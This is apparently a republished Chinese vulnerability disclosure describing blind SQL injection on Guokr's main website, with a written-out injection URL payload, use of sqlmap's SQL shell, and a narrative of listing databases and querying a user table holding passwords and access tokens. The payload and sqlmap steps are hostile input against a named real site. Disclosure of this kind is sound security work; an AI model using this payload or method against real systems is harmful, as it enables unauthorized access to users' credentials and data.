好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

果壳主站SQL注射,可获取站内用户数据 - 网站安

简单的看看主站,结果发现了一个注射,PostgreSQL的!

 

看到了个用户信息,密码和access_token的表。。。

详细说明:注射点:

 

http://HdhCmsTestguokr测试数据/group/posts/38/members/index.php?wd=123'%20and%20(SELECT%20COUNT(DISTINCT(datname))%20FROM%20pg_database)%3E5%20and%20'a'='a

 

盲注,用sqlmap的sqlshell跑跑

 

 

挺高的版本。

 

 

 

 

 

available databases [6]:

[*] backend

[*] postgres

[*] watson

[*] youth

 

没什么太有价值的东西,准备闪人的时候又like一下含有password字段的表,结果就这一次查询,改变了检测结果。

 

 

 

user_alias这个表里有啥?

 

 

 

此表记录数量:

 

 

60多万额,,

 

查询5条出来

 

 

HdhCmsTest2cto测试数据

 

结束,今天到这里,感觉问题不是单独存在的,这次这个点稍微有点难利用。两个在zone看到的PostgreSQL技巧也没用上,惭愧啊。  

修复方案: 字符型注射检测。

 

查看更多关于果壳主站SQL注射,可获取站内用户数据 - 网站安的详细内容...

  阅读:41次